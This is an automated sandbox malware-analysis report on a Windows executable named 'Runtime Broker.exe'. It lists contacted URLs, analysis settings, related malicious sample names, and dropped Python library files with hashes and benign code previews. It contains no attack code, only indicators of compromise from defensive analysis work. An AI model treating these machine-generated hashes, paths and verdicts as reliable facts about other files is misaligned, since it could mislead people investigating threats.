https://github.com/pypa/pip/issues/7498.	Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	false		high
http://tools.ietf.org/html/rfc6125#section-6.4.3	compat.py1.0.dr	false		high
http://aia.startssl.com/certs/ca.crt0	tcl86t.dll.0.dr	false	URL Reputation: safe	unknown
http://hdl.handle.net/1895.22/1013	nsg2001.tmp.0.dr	false		high
http://www.startssl.com/0P	tcl86t.dll.0.dr	false	URL Reputation: safe	unknown
http://192.168.0.1/Python/interrupt/test1.asp	Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.openssl.org/H	libssl-1_1.dll.0.dr, libcrypto-1_1.dll.0.dr	false		high
http://iana.org/	Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	false		high
https://github.com/psf/requests/pull/2238	Runtime Broker.exe, 00000000.00000002.922254878.0000000002950000.00000004.00000001.sdmp	false		high
http://tools.ietf.org/html/rfc3490	Runtime Broker.exe, 00000000.00000002.921795491.00000000027F7000.00000004.00000001.sdmp	false		high
http://code.activestate.com/recipes/576693/	compat.py1.0.dr	false		high
https://bugs.python.org/issue30418	logging.py.0.dr	false		high
http://sourceforge.net/projects/adodbapi	__init__.py23.0.dr	false		high

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528970
Start date:	26.11.2021
Start time:	07:25:21
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Runtime Broker.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.winEXE@1/404@4/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 99.4% (good quality ratio 96.1%) Quality average: 85.7% Quality standard deviation: 23.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 172.67.219.223, 104.21.24.179 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, store-images.s-microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, lucaespo.altervista.org.cdn.cloudflare.net, arc.msn.com Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
google.com	DriverPack-17-Online_1545867873.1567557659.exe	Get hash	malicious	Browse	216.58.215.238
	vvbaRodXx6.exe	Get hash	malicious	Browse	172.217.168.68
	nHVX85m7zN.exe	Get hash	malicious	Browse	172.217.168.68
	HSBC ... Wire Transfer Copy.exe	Get hash	malicious	Browse	172.217.168.83
	Acct # 3288-1258-4NQ39NGAY0GD'pdf.ppam	Get hash	malicious	Browse	172.217.168.9
	Acct # 3288-1258-1NQ39NGAY0GD'pdf.ppam	Get hash	malicious	Browse	172.217.168.9
	Credit Card and ID.ppam	Get hash	malicious	Browse	172.217.168.9
	Order Contract_signed (2NQ39NGAY0GD).ppam	Get hash	malicious	Browse	172.217.168.9
	BBVA Liquidaci#U00f3n por Factorizaci#U00f3n de Cr#U00e9ditos.exe	Get hash	malicious	Browse	142.250.185.206
	RFQ_TZDQP2110257921.exe	Get hash	malicious	Browse	142.250.185.142

ASN

No context

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\adodbapi.py	8v4iWYLvKJ.exe	Get hash	malicious	Browse
	WhQZ6UbCEY.exe	Get hash	malicious	Browse
C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\ado_consts.py	8v4iWYLvKJ.exe	Get hash	malicious	Browse
	WhQZ6UbCEY.exe	Get hash	malicious	Browse
C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\apibase.py	8v4iWYLvKJ.exe	Get hash	malicious	Browse
	WhQZ6UbCEY.exe	Get hash	malicious	Browse
C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\__init__.py	8v4iWYLvKJ.exe	Get hash	malicious	Browse
	WhQZ6UbCEY.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\WinSoft Update Service\LICENSE.txt Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	13029
Entropy (8bit):	5.149727600402855
Encrypted:	false
SSDEEP:	384:Hpe7TXadIJDmXPkVDslzgw4fESsixKioe:w7TXCIJDmXPkVDXzfESsixKioe
MD5:	A00A6EA9D31EB93ABCB65993FE2D368D
SHA1:	4C5C32D5DE84D9727EA4BF6D9965ACEC9BE562C7
SHA-256:	B7356E23B1D2A6FFB2409091374D595C35B31DCA87B60131A8869F01A87D9A77
SHA-512:	3D0928B574404A04DCDE837E82453C6743B2A80811F6C1F16F3194E6F886E216C2AE5D3722F07E0CA050C5AC6B3F81C8ED9E715DFC024EDF1897A6BC0DFA510B
Malicious:	false
Reputation:	low
Preview:	A. HISTORY OF THE SOFTWARE..==========================....Python was created in the early 1990s by Guido van Rossum at Stichting..Mathematisch Centrum (CWI, see http://www.cwi.nl) in the Netherlands..as a successor of a language called ABC. Guido remains Python's..principal author, although it includes many contributions from others.....In 1995, Guido continued his work on Python at the Corporation for..National Research Initiatives (CNRI, see http://www.cnri.reston.va.us)..in Reston, Virginia where he released several versions of the..software.....In May 2000, Guido and the Python core development team moved to..BeOpen.com to form the BeOpen PythonLabs team. In October of the same..year, the PythonLabs team moved to Digital Creations, which became..Zope Corporation. In 2001, the Python Software Foundation (PSF, see..https://www.python.org/psf/) was formed, a non-profit organization..created specifically to own Python-related Intellectual Property...Zope Corporation was a sponsoring

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\PyWin32.chm Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	MS Windows HtmlHelp Data
Category:	dropped
Size (bytes):	2666406
Entropy (8bit):	7.949558097893831
Encrypted:	false
SSDEEP:	49152:kzn4r59Wpu0jwKAaJShFPBCUhRULg5FZDqhJlaiSB1k2N+g9cfNsO6:prTWpuUwKTqFRULMDDSIiqNRcNH6
MD5:	2F80D124E8C55E04E7C1216A2E8CEDC1
SHA1:	3728E9337E563D46E7C6100D0E0212B49B15ED95
SHA-256:	271A48231F3A82D2A211BCCC304715B76A8E1059A5FDC7CE5648B231C81BF22E
SHA-512:	529FC8D41122E6B6539E3D6C54B333DE0616362CB17CE087480B47A1B63660A84117522705ED186FC153D93FC7EF5D555B3CC86F04B49502AEA7569645E3FE29
Malicious:	false
Reputation:	low
Preview:	ITSF....`.........k}.......\|.{.......".....\|.{......."..`...............x.......T.........................(.............ITSP....T...................M.......L.......N.......j..].!......."..T...............PMGL8................/..../#IDXHDR....T.../#ITBITS..../#STRINGS...3..../#SYSTEM....../#TOCIDX....T.. ./#TOPICS....t.. ./#URLSTR....,..../#URLTBL........./#WINDOWS....+.L./$FIftiMain....n..f./$OBJINST..../.?./$WWAssociativeLinks/..../$WWAssociativeLinks/Property....+../$WWKeywordLinks/..../$WWKeywordLinks/BTree....w..L./$WWKeywordLinks/Data....C..n./$WWKeywordLinks/Map....1.Z./$WWKeywordLinks/Property..... ./_winxptheme.html....w..&/_winxptheme__CloseThemeData_meth.html...(..+/_winxptheme__DrawThemeBackground_meth.html...E.i%/_winxptheme__DrawThemeText_meth.html......0/_winxptheme__EnableThemeDialogTexture_meth.html...4.g%/_winxptheme__EnableTheming_meth.html......C+/_winxptheme__GetCurrentThemeName_meth.html....^.W-/_winxptheme__GetThemeAppProperties_meth.html....5._5/_winxptheme_

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\_distutils_hack\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	3552
Entropy (8bit):	4.67928232814477
Encrypted:	false
SSDEEP:	48:kxexCaR+nPveIPLy/LFYjpbs7+vVkccSv1l+FWfUDfOI3H4DfUqP8Q1S:kbaCPveem/B41Dpdl4WsLOqH4LUqP8l
MD5:	9232E921950022747536A051B68BD548
SHA1:	BAD0DAA92BCE2095223EB52142306429CE6B4090
SHA-256:	C05B8045C9A51ED915DB41DF44195068C3D8EE1431F93104B670695DECAC8B02
SHA-512:	11958CADCE9B9B091060703616787AF85AB5190278CAC5373136EAA3BE0E580799CD8FAB65125268E84B91E1F73672F7872E2DBB2649354349B20BD0B6EAD912
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
Preview:	import sys.import os.import re.import importlib.import warnings...is_pypy = '__pypy__' in sys.builtin_module_names...def warn_distutils_present():. if 'distutils' not in sys.modules:. return. if is_pypy and sys.version_info < (3, 7):. # PyPy for 3.6 unconditionally imports distutils, so bypass the warning. # https://foss.heptapod.net/pypy/pypy/-/blob/be829135bc0d758997b3566062999ee8b23872b4/lib-python/3/site.py#L250. return. warnings.warn(. "Distutils was imported before Setuptools, but importing Setuptools ". "also replaces the `distutils` module in `sys.modules`. This may lead ". "to undesirable behaviors or errors. To avoid these issues, avoid ". "using distutils directly, ensure that setuptools is installed in the ". "traditional way (e.g. not an editable install), and/or make sure ". "that setuptools is always imported before distutils.")...def clear_distutils():. if 'distutils' not in sys.modules:.

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\_distutils_hack\override.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	44
Entropy (8bit):	4.171453562658727
Encrypted:	false
SSDEEP:	3:5QW6BMW2y+CBhTEu:+96W2y+4hx
MD5:	012A3E19D518D130A36BEAF917A091C7
SHA1:	358F87C599947263E8ADF079CB2131A522876AF8
SHA-256:	12EFECF8D17A5486780AA774B5B6C0E70B56932D8864F35DF1EB7A18BB759B3A
SHA-512:	76D17C1246B920B7E71F196876A2FCD6A3E102F10933CAC558DD993B6AA794766D657B85E0A7E56A71DF5F14C2F95A9E6576D81163509BB42DEC0FC0E49B9998
Malicious:	false
Reputation:	low
Preview:	__import__('_distutils_hack').do_override().

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\__init__.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	2097
Entropy (8bit):	4.819004732198873
Encrypted:	false
SSDEEP:	48:axtohGsrHAKNPcd+WN6jrdXjzUJqJSHzUJqJ7+2z5YqJ2R:CtohGsrHAKuV8jBHcqJicqJn5YqJ+
MD5:	B20A830A82F6F8DF8F57FD5EC837F2AD
SHA1:	2590761DFBE32D8225EC7C460D947647E25DBABB
SHA-256:	DE8937B154BA0D050A40E574D5F7B55B3CD80DD22C3866EE7484BF3EB398F421
SHA-512:	7E65CA75D9B27B3340D95682C3563A06C3AD3E981381C416D0B140FA389E87E284045E03B99C75E0C750A763B06C630C19BD0D2D18B1FEC9920F5DA2016656B8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 8v4iWYLvKJ.exe, Detection: malicious, Browse Filename: WhQZ6UbCEY.exe, Detection: malicious, Browse
Reputation:	low
Preview:	"""adodbapi - A python DB API 2.0 (PEP 249) interface to Microsoft ADO..Copyright (C) 2002 Henrik Ekelund, version 2.1 by Vernon Cole.* http://sourceforge.net/projects/adodbapi.""".import sys.import time..from .apibase import apilevel, threadsafety, paramstyle.from .apibase import Warning, Error, InterfaceError, DatabaseError, DataError, OperationalError, IntegrityError.from .apibase import InternalError, ProgrammingError, NotSupportedError, FetchFailedError.from .apibase import NUMBER, STRING, BINARY, DATETIME, ROWID..from .adodbapi import connect, Connection, __version__, dateconverter, Cursor..def Binary(aString):. """This function constructs an object capable of holding a binary (long) string value. """. return bytes(aString)..def Date(year,month,day):. "This function constructs an object holding a date value. ". return dateconverter.Date(year,month,day)..def Time(hour,minute,second):. "This function constructs an object holding a time value. ". return dateconvert

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\ado_consts.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	10615
Entropy (8bit):	4.8560236077729035
Encrypted:	false
SSDEEP:	192:ihyx4kaEkr8Co4rYLEAo9ihcXfNAqGlXpAxkPS:Is5BQMpA6S
MD5:	97FB4474CEF9DCFACD24AD7A8B66CE1F
SHA1:	710977BD4BF3D6B246CB1C98D792BA4214F54F47
SHA-256:	CE3520EE60137104F5C67AD6548D7B3DE58ED0B9B10055050E816631D3B2C265
SHA-512:	939E5A32EC4A70A388EA818AB7BB3525C9B05C0E99F5868F91A9F11BF1A0CD39CADEB2814265B58758074BC7FA14505C0FC393A3EA295D8CAD7D4E3349459823
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 8v4iWYLvKJ.exe, Detection: malicious, Browse Filename: WhQZ6UbCEY.exe, Detection: malicious, Browse
Preview:	# ADO enumerated constants documented on MSDN:.# http://msdn.microsoft.com/en-us/library/ms678353(VS.85).aspx..# IsolationLevelEnum.adXactUnspecified = -1.adXactBrowse = 0x100.adXactChaos = 0x10.adXactCursorStability = 0x1000.adXactIsolated = 0x100000.adXactReadCommitted = 0x1000.adXactReadUncommitted = 0x100.adXactRepeatableRead = 0x10000.adXactSerializable = 0x100000..# CursorLocationEnum.adUseClient = 3.adUseServer = 2..# CursorTypeEnum.adOpenDynamic = 2.adOpenForwardOnly = 0.adOpenKeyset = 1.adOpenStatic = 3.adOpenUnspecified = -1..# CommandTypeEnum.adCmdText = 1.adCmdStoredProc = 4.adSchemaTables = 20..# ParameterDirectionEnum.adParamInput = 1.adParamInputOutput = 3.adParamOutput = 2.adParamReturnValue = 4.adParamUnknown = 0.directions = {. 0: 'Unknown',. 1: 'Input',. 2: 'Output',. 3: 'InputOutput',. 4: 'Return',. }.def ado_direction_name(ado_dir):. try:. retu

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\adodbapi.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable
Category:	dropped
Size (bytes):	46685
Entropy (8bit):	4.419352479786135
Encrypted:	false
SSDEEP:	768:+uQoM2MTj9ZwnKSt0d2vIZQdnwvu1/rqqoEpArtgcyWxrRT5kKY0q:+4M2uj9ZwnKSt0d2AqwvuhH9pArJlrR8
MD5:	A317F57F74000448FC234F02896EA7AD
SHA1:	E66CEF5A6C97CAF3DC7A6207685476F3606D75E4
SHA-256:	3943D0F55BE9ABB301F686C15B15117C34769F9B9E78420E4127D1AF72196E14
SHA-512:	BA5B85F59B4A2B6E5C6040B0CB605A31DABCACF5D3AD2F04472F1C6E0A9F6A5992B1863CD4EB6172FDF99267E3D515B800083B0DD36FBDCF7DDE548DA8ED9ABF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 8v4iWYLvKJ.exe, Detection: malicious, Browse Filename: WhQZ6UbCEY.exe, Detection: malicious, Browse
Preview:	"""adodbapi - A python DB API 2.0 (PEP 249) interface to Microsoft ADO..Copyright (C) 2002 Henrik Ekelund, versions 2.1 and later by Vernon Cole.* http://sourceforge.net/projects/pywin32.* https://github.com/mhammond/pywin32.* http://sourceforge.net/projects/adodbapi.. This library is free software; you can redistribute it and/or. modify it under the terms of the GNU Lesser General Public. License as published by the Free Software Foundation; either. version 2.1 of the License, or (at your option) any later version... This library is distributed in the hope that it will be useful,. but WITHOUT ANY WARRANTY; without even the implied warranty of. MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU. Lesser General Public License for more details... You should have received a copy of the GNU Lesser General Public. License along with this library; if not, write to the Free Software. Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 0211

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\apibase.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable, with CRLF line terminators
Category:	dropped
Size (bytes):	28881
Entropy (8bit):	4.730277036239611
Encrypted:	false
SSDEEP:	384:FMAe5m0i6e5k79qfgpdRTUxG0rt7t4OZ8+ZtQDjZ6wnJkbUU/ziIsu:FM35mOe5k7lvUo0rtZdZ8cgjZ6qJsrf
MD5:	97ACA6B9A28FFA7AE2B3CCBF4DD828DE
SHA1:	4E57BA7A7D292C31BD78CD28BE64A4FEDB2B9305
SHA-256:	B73BA9EEC87E69E56A4E8D27F2961AF34B5298655EA64013CFCA38700053D34B
SHA-512:	44D972303AE0114694962DDC34FFC7629BD18D0EF8BF8FF85DD71E8E7A1E74C56E39461B9CF5437DA0ADD0077A8BCA46795772CAB2455239FF2D7B467A52C0EE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 8v4iWYLvKJ.exe, Detection: malicious, Browse Filename: WhQZ6UbCEY.exe, Detection: malicious, Browse
Preview:	"""adodbapi.apibase - A python DB API 2.0 (PEP 249) interface to Microsoft ADO....Copyright (C) 2002 Henrik Ekelund, version 2.1 by Vernon Cole..* http://sourceforge.net/projects/pywin32..* http://sourceforge.net/projects/adodbapi.."""....import sys..import time..import datetime..import decimal..import numbers..# noinspection PyUnresolvedReferences..from . import ado_consts as adc....verbose = False # debugging flag....onIronPython = sys.platform == 'cli'..if onIronPython: # we need type definitions for odd data we may need to convert.. # noinspection PyUnresolvedReferences.. from System import DBNull, DateTime.. NullTypes = (type(None), DBNull)..else:.. DateTime = type(NotImplemented) # should never be seen on win32.. NullTypes = type(None)....# --- define objects to smooth out Python3 <-> Python 2.x differences..unicodeType = str..longType = int..StringTypes = str..makeByteBuffer = bytes..memoryViewType = memoryview.._BaseException = Exception....try:

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\examples\db_print.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable, with CRLF line terminators
Category:	dropped
Size (bytes):	2236
Entropy (8bit):	4.833903677213369
Encrypted:	false
SSDEEP:	24:HR7CVAw3OckCk/URiI9bhB2wt5ppK44ZSHt4YyLlOBvZ+VCwKLE19prDwK+GK39i:xm18ERi+PpK44ZSN4ZLm+4GbwVt3yg6h
MD5:	96D9F5F4ECD8049CE3D960FB057B2F17
SHA1:	B0589009D0D3BE258D3BE0273FE6F4206B07E1E4
SHA-256:	2611B52E7AC518E5834E9328A89D2EAE90E407F2506349E45B85FC94B981E496
SHA-512:	E719AEE26BAACAA362E26E3FE9862B667A31AB6B1B0E34DC310E52BE8A7138E5FAFCD2BF6C1456CC69BF15BE401D39878FEEB8A9E59C636F3897FFB005CB30B3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	""" db_print.py -- a simple demo for ADO database reads."""....import sys..import adodbapi.ado_consts as adc....cmd_args = ('filename', 'table_name')..if 'help' in sys.argv:.. print('possible settings keywords are:',cmd_args).. sys.exit()....kw_args = {} # pick up filename and proxy address from command line (optionally)..for arg in sys.argv:.. s = arg.split("=").. if len(s) > 1:.. if s[0] in cmd_args:.. kw_args[s[0]] = s[1]....kw_args.setdefault('filename', "test.mdb") # assumes server is running from examples folder..kw_args.setdefault('table_name', 'Products') # the name of the demo table....# the server needs to select the provider based on his Python installation..provider_switch = ['provider', 'Microsoft.ACE.OLEDB.12.0', "Microsoft.Jet.OLEDB.4.0"]....# ------------------------ START HERE -------------------------------------..#create the connection..constr = "Provider=%(provider)s;Data Source=%(filename)s"..import adodbapi as db..con = db.connect(

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\examples\db_table_names.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable, with CRLF line terminators
Category:	dropped
Size (bytes):	522
Entropy (8bit):	4.995125505838
Encrypted:	false
SSDEEP:	12:i+F7Q6K53hYxWvpB3h0clyeH59/M5EYc0rqt/hPWboc37fmm:nF7cPYCbRH59oEYcf/Otqm
MD5:	3FFD290D5415D1E2843A2ADDC9A4CB6E
SHA1:	B2EAC5CD09DD1EC02C2F44EFC00B7EC7B143B68A
SHA-256:	0E79174FDF00132979A19F4CC33489669A346B1E197F35F1CDA176FB308D627C
SHA-512:	F27222481063F9D996925EADDAA47BC5C39B390BBF57021B548518542823218AF412CC5A3ED2E4FC0537E24302260C8F3EF5654A6F48C6A7699F9206BC56B2DB
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	""" db_table_names.py -- a simple demo for ADO database table listing."""..import sys..import adodbapi....try:.. databasename = sys.argv[1]..except IndexError:.. databasename = "test.mdb"....provider = ['prv', "Microsoft.ACE.OLEDB.12.0", "Microsoft.Jet.OLEDB.4.0"]..constr = "Provider=%(prv)s;Data Source=%(db)s"....#create the connection..con = adodbapi.connect(constr, db=databasename, macro_is64bit=provider)....print('Table names in= %s' % databasename)....for table in con.get_table_names():.. print(table)..

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\examples\xls_read.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1126
Entropy (8bit):	5.052939482404708
Encrypted:	false
SSDEEP:	24:kxq9iLbhyvg/PaYKabL15z6MbeeGM4zrYErgyXV:kZ3wvgHFK4LP/beePYgyXV
MD5:	CCACBB18A5F1456C342A6FFCB51ABEDF
SHA1:	EFBD11A376B20F27B2BF4536A4F3CD3D88654C14
SHA-256:	7FFC036470F63D94A9F1148328688FFF50DD1409CA4320B4CC673FF1EBEA4118
SHA-512:	46A601881BA065CB6E88D9A20FA05A9F789442EB2FEA15B9ACDB4510965B2CF43CAA1ACEA412D6DE0A0C83EF98ED63CF03620A302CF0C90BB8FC6A7A2D91FC8D
Malicious:	false
Preview:	import sys..import adodbapi..try:.. import adodbapi.is64bit as is64bit.. is64 = is64bit.Python()..except ImportError:.. is64 = False....if is64:.. driver = "Microsoft.ACE.OLEDB.12.0"..else:.. driver = "Microsoft.Jet.OLEDB.4.0"..extended = 'Extended Properties="Excel 8.0;HDR=Yes;IMEX=1;"'....try: # first command line argument will be xls file name -- default to the one written by xls_write.py.. filename = sys.argv[1]..except IndexError:.. filename = 'xx.xls'....constr = "Provider=%s;Data Source=%s;%s" % (driver, filename, extended)....conn = adodbapi.connect(constr)....try: # second command line argument will be worksheet name -- default to first worksheet.. sheet = sys.argv[2]..except IndexError:.. # use ADO feature to get the name of the first worksheet.. sheet = conn.get_table_names()[0]....print('Shreadsheet=%s Worksheet=%s' % (filename, sheet))..print('------------------------------------------------------------')..crsr = conn.cursor()..sql = "SELE

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\examples\xls_write.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1381
Entropy (8bit):	4.964934119546142
Encrypted:	false
SSDEEP:	24:PIqqWSLbXimscDL15z2oWPkVYb0A65zx1114D1nCLirqLIo:PnS36cDLOvb0vD114JnCNLR
MD5:	8FBD18E3C821F43D68E55318B13CF693
SHA1:	26CB5FAED45DDB1CA6BE939CD2CA68B4AA2342FD
SHA-256:	6DC07615653BAB9E148DCA63291127E0DDA41BEF8F267582DE9BC1361E74BA42
SHA-512:	A12EAE3C9D5C0D17F3DEBB6FF40F885A1D58064A460E021803D49FE8E09D1F929B13F5B0DA6AB95CB5AE0FDCFDF145DAAA387557A61A7B37B35267F818B841D1
Malicious:	false
Preview:	import adodbapi..import datetime..try:.. import adodbapi.is64bit as is64bit.. is64 = is64bit.Python()..except ImportError:.. is64 = False # in case the user has an old version of adodbapi..if is64:.. driver = "Microsoft.ACE.OLEDB.12.0"..else:.. driver = "Microsoft.Jet.OLEDB.4.0"..filename = 'xx.xls' # file will be created if it does not exist..extended = 'Extended Properties="Excel 8.0;Readonly=False;"'....constr = "Provider=%s;Data Source=%s;%s" % (driver, filename, extended)....conn = adodbapi.connect(constr)..with conn: # will auto commit if no errors.. with conn.cursor() as crsr:.. try: crsr.execute('drop table SheetOne').. except: pass # just is case there is one already there.... # create the sheet and the header row and set the types for the columns.. crsr.execute('create table SheetOne (Name varchar, Rank varchar, SrvcNum integer, Weight float, Birth date)').... sql = "INSERT INTO SheetOne (name, rank , srvcnum, weight

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\is64bit.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable, with CRLF line terminators
Category:	dropped
Size (bytes):	1203
Entropy (8bit):	4.726247984834011
Encrypted:	false
SSDEEP:	24:tHUmPtH+vt/1T77ChCWiEkH//BQ7/hMiWnKF7BSfSQbIgvgGgQtICdeeppJRNE:tHXVHwtNTeC5bH//S7Cnk7BSfSQc1GgL
MD5:	436161183FF19C85F1B52A716D466FF6
SHA1:	233595387599435B72F82C3C87CFC733AB5633DE
SHA-256:	841024566C44BFE1C81350186F2968C6F06FA927AAAA45B6243A7AD8CBED632D
SHA-512:	A33036574205F9772D7E4F660E132925470DAEC2D634F8370D054133EF985FC93B502C586AF073F2251BE9BF5930174F8CCDD0A04B6FC34D9FD471B6650F4E59
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	"""is64bit.Python() --> boolean value of detected Python word size. is64bit.os() --> os build version"""..import sys....def Python():.. if sys.platform == 'cli': #IronPython.. import System.. return System.IntPtr.Size == 8.. else:.. try:.. return sys.maxsize > 2147483647.. except AttributeError:.. return sys.maxint > 2147483647....def os():.. import platform.. pm = platform.machine().. if pm != '..' and pm.endswith('64'): # recent Python (not Iron).. return True.. else:.. import os.. if 'PROCESSOR_ARCHITEW6432' in os.environ:.. return True # 32 bit program running on 64 bit Windows.. try:.. return os.environ['PROCESSOR_ARCHITECTURE'].endswith('64') # 64 bit Windows 64 bit program.. except (IndexError, KeyError):.. pass # not Windows.. try:.. return '64' in platform.architecture()[0] # this often works in Linux.. except:..

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\license.txt Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	26423
Entropy (8bit):	4.611827311945595
Encrypted:	false
SSDEEP:	384:Xv56OuAbnL0UP+X6wFDVxnF+7xqsvLt+z/k8E9HinIVFkspWM9bc7opt0SZuQi:Xv5trJ+DnFCL1leSWmc7ktvZuQi
MD5:	652B4E2F7A8A93E7ABDD2DE7031E0BDB
SHA1:	C627EBED0FC837F3F926B18F9A1712028D60F233
SHA-256:	610E0C3A24A26ACB0470F8F5EB0298DF966FC380CEE8E0FEBDAC6791B6209D6C
SHA-512:	7979E76E3706D83D8F59FF2F16F10373B7A14718E41CDBE2DA8EA3BB9AAD797DBDAAEDA44253F0ECABBC6A327A53138DF257BE4EB7CACCA6041F23A05C94A18D
Malicious:	false
Preview:	.. GNU LESSER GENERAL PUBLIC LICENSE... Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.]..... Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who decide to use it. You.can use it too, but we su

C:\Program Files (x86)\WinSoft Update Service\Lib\site-packages\adodbapi\process_connect_string.py Download File
Process:	C:\Users\user\Desktop\Runtime Broker.exe
File Type:	Python script, ASCII text executable, with CRLF line terminators
Category:	dropped
Size (bytes):	5494
Entropy (8bit):	4.4267978499209955
Encrypted:	false
SSDEEP:	96:5VhqUYGp3lPG5pPHwyfXu1X1+8HoJsK/ItGoGT+GTGNdMGtgN4JFH3i:kl0lPG5FQ/vNd/5H3i
MD5:	C6C854430269FFC0DFA7AD4510CAD7DF
SHA1:	65E446AC20FB633E93C29BADD1D6C154F940EE98
SHA-256:	5189EB3F731CA7C4E88E5BCCC3FEC77BE4E8BDD022D7ACE2CB1761C2497A6419
SHA-512:	33C38DC49536289EC08121F5506E252576E4ABA17553615A3B20359EEF62B3795067F7856D0F71BEB276FD5C6ECC06BF8F0B4973E43622D3904405121FC739B3
Malicious:	false
